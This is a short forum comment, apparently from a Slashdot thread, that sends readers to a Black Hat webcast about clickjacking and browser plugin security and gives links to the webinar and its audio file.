    GLaDOS for President 2016! "Well here we are again. It's always such a pleasure." -- GLaDOS, 2011

  19. Listen to his comments for the full story by Jeff+Moss · · Score: 3, Interesting

    Quick note: This article is a spin off of what Eric had to say during the most recent Black Hat Webcast, where Jeremiah Grossman was talking about clickjacking and other related browser issues. Eric made a lot of sense talking about plug ins and addons being the cross platform low hanging fruit.

    Listen and watch the webinar to hear what he had to say and keep everything in context:
    http://w.on24.com/r.htm?e=122494&s=1&k=05ED21C1734D531D2D84CA56F4ADB0F2

    Or download the .m4b audio file when we get it online next week here:
    https://www.blackhat.com/html/webinars/webinars-index.html